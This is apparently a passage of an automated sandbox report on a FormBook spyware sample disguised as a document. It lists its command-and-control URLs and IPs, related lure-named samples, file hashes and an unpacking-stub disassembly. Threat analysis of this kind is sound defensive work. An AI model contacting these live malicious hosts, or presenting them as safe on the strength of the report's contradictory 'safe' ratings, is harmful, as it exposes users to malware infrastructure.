| http://www.heldhold.xyz/fava/?pP_8=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&V0Qh=4pBta8 | true | Avira URL Cloud: safe | unknown |
| http://www.kfowks.site/c0yj/ | true | Avira URL Cloud: safe | unknown |
| http://www.dalong.site/v2c3/ | true | Avira URL Cloud: safe | unknown |
| http://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8 | true | Avira URL Cloud: safe | unknown |
| http://www.030002304.xyz/tmpg/ | true | Avira URL Cloud: safe | unknown |
| http://www.ultraleap.net/8pln/?pP_8=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSSTPR1nXcfMqNX8wInY=&V0Qh=4pBta8 | true | Avira URL Cloud: safe | unknown |
| http://www.asiapartnars.online/kt2f/ | true | Avira URL Cloud: safe | unknown |
| http://www.mfgarage.net/3lu7/ | true | Avira URL Cloud: safe | unknown |
| http://www.63582.photo/5o7d/ | true | Avira URL Cloud: safe | unknown |
| http://www.useanecdotenow.tech/68ac/ | true | Avira URL Cloud: safe | unknown |
| http://www.rtpngk.xyz/altr/ | true | Avira URL Cloud: safe | unknown |
| http://www.2bhp.com/a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= | true | Avira URL Cloud: safe | unknown |
| http://www.dalong.site/v2c3/?V0Qh=4pBta8&pP_8=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= | true | Avira URL Cloud: safe | unknown |
| http://www.ultraleap.net/8pln/ | true | Avira URL Cloud: safe | unknown |
| http://www.heldhold.xyz/fava/ | true | Avira URL Cloud: safe | unknown |
| http://www.40wxd.top/v4cy/ | true | Avira URL Cloud: safe | unknown |
| http://www.doggieradio.net/hzuv/?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8= | true | Avira URL Cloud: safe | unknown |
| http://www.useanecdotenow.tech/68ac/?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU= | true | Avira URL Cloud: safe | unknown |
| http://www.mgeducacaopro.online/xamn/ | true | Avira URL Cloud: safe | unknown |
| http://www.asiapartnars.online/kt2f/?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8 | true | Avira URL Cloud: safe | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| https://duckduckgo.com/chrome_newtab | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://duckduckgo.com/ac/?q= | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://whois.gandi.net/en/results?search=ultraleap.net | mstsc.exe, 00000003.00000002.4145420454.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.4148237192.00000000073C0000.00000004.00000800.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000002E16000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.google.com/images/branding/product/ico/googleg_lodp.ico | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FpP_8%3DnzWo | mstsc.exe, 00000003.00000002.4145420454.0000000005D56000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000003AA6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.gandi.net/en/domain | mstsc.exe, 00000003.00000002.4145420454.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.4148237192.00000000073C0000.00000004.00000800.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000002E16000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.ecosia.org/newtab/ | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.kfowks.site | NZuQxWwOkTbZ.exe, 00000005.00000002.4147103044.0000000004D2F000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ac.ecosia.org/autocomplete?q= | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3Q | mstsc.exe, 00000003.00000002.4145420454.000000000570E000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.000000000345E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.rtpngk.xyz/altr/?pP_8=VbdX0kog8qSHBufLtK | mstsc.exe, 00000003.00000002.4145420454.000000000607A000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000003DCA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| 67.223.117.189 | www.heldhold.xyz | United States | | 15189 | VIMRO-AS15189US | true |
| 147.92.40.175 | azkwupgf.as66588.com | Hong Kong | | 59371 | DNC-ASDimensionNetworkCommunicationLimitedHK | true |
| 65.21.196.90 | 030002304.xyz | United States | | 199592 | CP-ASDE | true |
| 172.96.187.60 | dalong.site | Canada | | 32475 | SINGLEHOP-LLCUS | true |
| 188.114.97.3 | www.rtpngk.xyz | European Union | | 13335 | CLOUDFLARENETUS | true |
| 38.181.141.122 | www.kfowks.site | United States | | 174 | COGENT-174US | true |
| 217.70.184.50 | webredir.vip.gandi.net | France | | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true |
| 81.88.63.46 | www.2bhp.com | Italy | | 39729 | REGISTER-ASIT | true |
| 104.21.11.31 | www.b5x7vk.agency | United States | | 13335 | CLOUDFLARENETUS | true |
| 206.119.82.134 | 40wxd.top | United States | | 174 | COGENT-174US | true |
| 3.33.130.190 | useanecdotenow.tech | United States | | 8987 | AMAZONEXPANSIONGB | true |
| 85.153.138.113 | www.mfgarage.net | Turkey | | 12946 | TELECABLESpainES | true |
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1509246
Start date and time: 2024-09-11 11:16:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DOC092024-0431202229487.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@17/12
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 91%
                                                      • Number of executed functions: 63
                                                      • Number of non-executed functions: 290
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
| 05:17:46 | API Interceptor | 13801335x Sleep call for process: mstsc.exe modified |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| 67.223.117.189 | LisectAVT_2403002B_466.exe | Get hash | malicious | FormBook | Browse | www.techstone.top/d5fo/ |
| | Shipping Documents 7896424100.exe | Get hash | malicious | FormBook | Browse | www.nodedev.top/wnsq/ |
| | ORDEN_240715189833.IMG | Get hash | malicious | DarkTortilla, FormBook | Browse | www.akissdove.xyz/8ntn/ |
| | OrderPI.exe | Get hash | malicious | FormBook | Browse | www.helidove.xyz/no40/ |
| | PRE-ALERT HTHC22031529.exe | Get hash | malicious | FormBook | Browse | www.nodedev.top/wnsq/ |
| | Scan405.exe | Get hash | malicious | FormBook | Browse | www.bandbid.top/38gc/ |
| | ScanPDF_102.exe | Get hash | malicious | FormBook | Browse | www.bandbid.top/38gc/ |
| | SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exe | Get hash | malicious | FormBook | Browse | www.nodedev.top/o93t/ |
| | 9hD6o07kwl.exe | Get hash | malicious | FormBook | Browse | www.advenhub.online/0so0/ |
| | TFMUpLhFq6.exe | Get hash | malicious | FormBook | Browse | www.bandbid.top/38gc/ |
| 65.21.196.90 | Remittance advice.exe | Get hash | malicious | FormBook | Browse | www.070001350.xyz/zvc6/ |
| | doc330391202408011.exe | Get hash | malicious | FormBook | Browse | www.030002060.xyz/oap7/ |
| | DHL airwaybill # 6913321715 & BL Draft copy.exe | Get hash | malicious | FormBook | Browse | www.030002721.xyz/i28e/ |
| | yyyyyyyy.exe | Get hash | malicious | FormBook | Browse | www.030002060.xyz/d629/?EN-hu=KAaEqqZfS4cDvU3Ij6Gom2nrmNT9tw2tnUHZxD+rCxnnN6LgNdSAGbreu7nZG1S4n6xTi0fmbnaWzdqJKm8Z7U+GaCKh7LK1IRPJE/WiiU/xJvV0/w==&zx=TzUh |
| | AUG 2024 SOA.exe | Get hash | malicious | FormBook | Browse | www.070001294.xyz/ohwx/ |
| | REQST_PRC 410240665_2024.exe | Get hash | malicious | FormBook | Browse | www.030002060.xyz/oap7/ |
| | REQST_PRC 410240.exe | Get hash | malicious | FormBook | Browse | www.030002060.xyz/oap7/ |
| | DPPLYAD_12872 PDF.exe | Get hash | malicious | FormBook | Browse | www.070001606.xyz/he2a/?nN=Sxl0i64hVtElz&CPG=LI2nq68wUFFStxnjJLN/mxD+8w5AbIj+oNjKa57fODVw+yTphrFd8cr1ngYbeJKQp45Y |
| | bintoday1.exe | Get hash | malicious | FormBook | Browse | www.030002721.xyz/jpse/ |
| | Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe | Get hash | malicious | FormBook | Browse | www.030002060.xyz/swxs/ |
| 172.96.187.60 | xU0wdBC6XWRZ6UY.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| webredir.vip.gandi.net | PO #86637.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | au1FjlRwFR.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | COTIZACION 290824.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | DHL AWB TRACKING DETAILS.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | Pedido De Compra OC 4504 19082024 De Grupoeld SAS.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | Udspecialiser45.exe | Get hash | malicious | FormBook, GuLoader | Browse | 217.70.184.50 |
| | qEW7hMvyV7.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
| | z1PEDIDODECOMPRAURGENTE.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50 |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SINGLEHOP-LLCUS | PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | 172.96.187.211
SINGLEHOP-LLCUS | Documents_Verification_Review_[PDF]_#20SE6GX.html | malicious | HTMLPhisher | 108.178.43.142
SINGLEHOP-LLCUS | http://bakhaa05.github.io/ | malicious | Unknown | 162.253.224.21
SINGLEHOP-LLCUS | https://detailstrustedhere.x10.mx/try/mp | malicious | Unknown | 162.253.224.21
SINGLEHOP-LLCUS | https://b00gjbzv.r.us-west-2.awstrack.me/L0/https:%2F%2Fparaisowp.com%2Fm%2F%3Fc3Y9bzM2NV8xX25vbSZyYW5kPVQwZHlZa1k9JnVpZD1VU0VSMzAwODIwMjRVMjgwODMwMTU=N0123Nthall@op-f.org/1/01010191d79d900e-6255b045-a5e4-48b9-8b6b-ab6da554744e-000000/isZBEtKqJzwXn-iQuzgeaENPxGA=391 | malicious | Unknown | 198.20.111.120
SINGLEHOP-LLCUS | https://eonlinealbum.com/wp-admin/network/network/H1093.php%20eonlinealbum.com | malicious | Unknown | 198.143.164.252
SINGLEHOP-LLCUS | MV ALIADO-S-REQ-19-000640.exe | malicious | FormBook | 172.96.187.211
SINGLEHOP-LLCUS | https://securemetamaskvallet.webflow.io/ | malicious | Unknown | 198.143.164.252
SINGLEHOP-LLCUS | https://beepeople.com.br/wp-login.php?action=rp&key=A3iAn20LIOulNyvDirfj&login=www.bgdrnq.blogspot.fr%20-%20107%20156%20USD%20BTC%20i2jqdl | malicious | Unknown | 198.143.164.252
SINGLEHOP-LLCUS | http://lapersianeria.com/mot/a2FyZW5fdmFuX291dHJ5dmVAZmQub3Jn | malicious | Unknown | 184.154.193.210
CP-ASDE | Remittance advice.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | VMRhiAFJtl.exe | malicious | Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer, RedLine, Stealc | 65.21.18.51
CP-ASDE | http:///ipscanadvsf.com | malicious | Unknown | 65.21.119.50
CP-ASDE | XpCyBwDzEt.exe | malicious | Amadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLine | 65.21.18.51
CP-ASDE | g082Q9DajU.exe | malicious | PureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer | 65.21.18.51
CP-ASDE | doc330391202408011.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | DHL airwaybill # 6913321715 & BL Draft copy.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | yyyyyyyy.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | bot_library.exe | malicious | Unknown | 65.21.94.13
CP-ASDE | AUG 2024 SOA.exe | malicious | FormBook | 65.21.196.90
DNC-ASDimensionNetworkCommunicationLimitedHK | Udspecialiser45.exe | malicious | FormBook, GuLoader | 147.92.36.247
DNC-ASDimensionNetworkCommunicationLimitedHK | http://oveman-austral.com/ | malicious | Unknown | 147.92.44.231
DNC-ASDimensionNetworkCommunicationLimitedHK | PURCHASING ORDER.exe | malicious | FormBook, PureLog Stealer | 147.92.35.81
DNC-ASDimensionNetworkCommunicationLimitedHK | a82WdwCQnQOQf4b.exe | malicious | FormBook | 147.92.35.81
DNC-ASDimensionNetworkCommunicationLimitedHK | PTT Group project - Quotation.exe | malicious | FormBook | 147.92.36.231
DNC-ASDimensionNetworkCommunicationLimitedHK | RFQ - MK FMHS.RFQ.24.101.exe | malicious | FormBook | 207.148.37.252
DNC-ASDimensionNetworkCommunicationLimitedHK | Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe | malicious | FormBook | 45.126.181.243
DNC-ASDimensionNetworkCommunicationLimitedHK | mQY9ka5sW6hv2Ri.exe | malicious | FormBook | 147.92.43.172
DNC-ASDimensionNetworkCommunicationLimitedHK | Materials specification with quantities.exe | malicious | FormBook | 147.92.36.232
DNC-ASDimensionNetworkCommunicationLimitedHK | kpCSGLBxAw2RnrW.exe | malicious | FormBook | 147.92.43.172
VIMRO-AS15189US | SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exe | malicious | FormBook | 67.223.118.13
VIMRO-AS15189US | LisectAVT_2403002B_466.exe | malicious | FormBook | 67.223.117.189
VIMRO-AS15189US | H37012.exe | malicious | FormBook, PureLog Stealer | 67.223.118.13
VIMRO-AS15189US | file.exe | malicious | LummaC, Clipboard Hijacker, LummaC Stealer | 67.223.119.7
VIMRO-AS15189US | file.exe | malicious | LummaC, Clipboard Hijacker, LummaC Stealer | 67.223.119.7
VIMRO-AS15189US | Shipping Documents 7896424100.exe | malicious | FormBook | 67.223.117.189
VIMRO-AS15189US | ORDEN_240715189833.IMG | malicious | DarkTortilla, FormBook | 67.223.117.189
VIMRO-AS15189US | OrderPI.exe | malicious | FormBook | 67.223.117.189
VIMRO-AS15189US | PO HA25622.exe | malicious | FormBook | 67.223.118.13
VIMRO-AS15189US | PRE-ALERT HTHC22031529.exe | malicious | FormBook | 67.223.117.189
                                                      No context
                                                      No context
Process: C:\Windows\SysWOW64\mstsc.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\DOC092024-0431202229487.exe
File Type: data
Category: dropped
Size (bytes): 287744
Entropy (8bit): 7.995383375682175
Encrypted: true
SSDEEP: 6144:m5EEXnQ9wBySivOD+qrHzFh/FrMBXugDvrwpAmNlPQ4bxQ:dwmwwCD+2TFIu55bG
MD5: 80E9D5DC059060F4C5C2424774B52DB5
SHA1: 822F8DDA3B47F5E2BEA4CE7A34AA2FB2E5B66C15
SHA-256: FE946066454F6A1480E6D166B864CB6D482883FFCF2A8334264515388D8D6161
SHA-512: E6EBC137CDC8A6DE9E751F9236C71C200EABBC3899089221F99AA16DC4D6BE730C22D5DC4194321906FB18768D3C31625F522F826E844DAE6552EA490EFEE884
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\DOC092024-0431202229487.exe
File Type: data
Category: dropped
Size (bytes): 50472
Entropy (8bit): 7.8038243115079045
Encrypted: false
SSDEEP: 768:y2zzAHI/lnSPajtT8PrzeB4WObzI2SteNC/m939zwVsb2/ZmWoZvXh+HPH9EW:y2zcHeSmN8PrzS4nXStekgI22/uZJsHn
MD5: DC584487FE1E5A044F79C6E466AC804E
SHA1: 861635C7A408C2BC51264B3CD065ECCDE6BBE7FE
SHA-256: 5E3F308E2CF084237881C051F15334D0BB26D8A39A14A554601E87EF8E49F972
SHA-512: A38C61C75872489652F298259370C2CB43DE623A33EC0967CEEB06A86C945D5521984371686C66DD05DAEE21F7423B0FDB052E4A25EFD4577E3314DDC66323C7
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\DOC092024-0431202229487.exe
File Type: ASCII text, with very long lines (57348), with no line terminators
Category: dropped
Size (bytes): 57348
Entropy (8bit): 5.747699877171752
Encrypted: false
SSDEEP: 1536:Sc8ZPB/DlWDshQ5ZIpDfIemXJlyvnQUBLi6C4ezfs5zxxz:SJZpD4saTIFVM6fb9Ytz0h
MD5: 68CE7E81CFCF0A7B956545CAFDCC41D0
SHA1: 255EF97404F860D1400583CFDB22B48588F4D5D3
SHA-256: 3D1C502A7A65D75470EB818FED779EFB0CD5B198BC531AD33B8BF619492ED07D
SHA-512: A47915BA4415E31CD6C9339FF236BF9267F01348DC5372A224673277501438FB64206C8AA42622BEE3FF6F06792ED52A33BDE895C919F9710C25A637D4CCC582
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit): 7.955261164820323
TrID:
• Win32 Executable (generic) a (10002005/4) 99.39%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Win32 EXE Yoda's Crypter (26571/9) 0.26%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: DOC092024-0431202229487.exe
File size: 753'664 bytes
MD5: 3a3b2034d8649f6112faa82e0daba310
SHA1: f3f9eb85d09171f0b92412cf5d4229d034f7417e
SHA256: e355fe9720526a9376e0557040f4d2e4eb0772a41b18c027403566500929f4e5
SHA512: 063fdbb16f6c7603256b926671b04f47cc8903a7d90ed9555a440a2dcfed6c40d97e90643a31636820ca0ff6d20bfa9f79ce26670aefbb05e5319101aa56141a
SSDEEP: 12288:fXe9PPlowWX0t6mOQwg1Qd15CcYk0We1FVWKXolCA8GzG1U/uS7UJkrBUobMoGyq:mhloDX0XOf4VWhXm1UWgZUCMoGyXpOkm
TLSH: 46F4234954D9CCEAF36AA330D0B7CE5625667931CEC5676C9328E62DBC30303A952C6F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x53b090
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66E156BE [Wed Sep 11 08:37:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: ef471c0edf1877cd5a881a6a8bf647b9
                                                      Instruction
                                                      pushad
                                                      mov esi, 004E7000h
                                                      lea edi, dword ptr [esi-000E6000h]
                                                      push edi
                                                      jmp 00007F658CB496CDh
                                                      nop
                                                      mov al, byte ptr [esi]
                                                      inc esi
                                                      mov byte ptr [edi], al
                                                      inc edi
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB496AFh
                                                      mov eax, 00000001h
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc eax, eax
                                                      add ebx, ebx
                                                      jnc 00007F658CB496CDh
                                                      jne 00007F658CB496EAh
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB496E1h
                                                      dec eax
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc eax, eax
                                                      jmp 00007F658CB49696h
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc ecx, ecx
                                                      jmp 00007F658CB49714h
                                                      xor ecx, ecx
                                                      sub eax, 03h
                                                      jc 00007F658CB496D3h
                                                      shl eax, 08h
                                                      mov al, byte ptr [esi]
                                                      inc esi
                                                      xor eax, FFFFFFFFh
                                                      je 00007F658CB49737h
                                                      sar eax, 1
                                                      mov ebp, eax
                                                      jmp 00007F658CB496CDh
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB4968Eh
                                                      inc ecx
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB49680h
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc ecx, ecx
                                                      add ebx, ebx
                                                      jnc 00007F658CB496B1h
                                                      jne 00007F658CB496CBh
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jnc 00007F658CB496A6h
                                                      add ecx, 02h
                                                      cmp ebp, FFFFFB00h
                                                      adc ecx, 02h
                                                      lea edx, dword ptr [edi+ebp]
                                                      cmp ebp, FFFFFFFCh
                                                      jbe 00007F658CB496D0h
                                                      mov al, byte ptr [edx]
                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2012 UPD4 build 61030
                                                      • [RES] VS2012 UPD4 build 61030
                                                      • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19f388 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13c000 | 0x63388 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x19f7ac | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x13b274 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
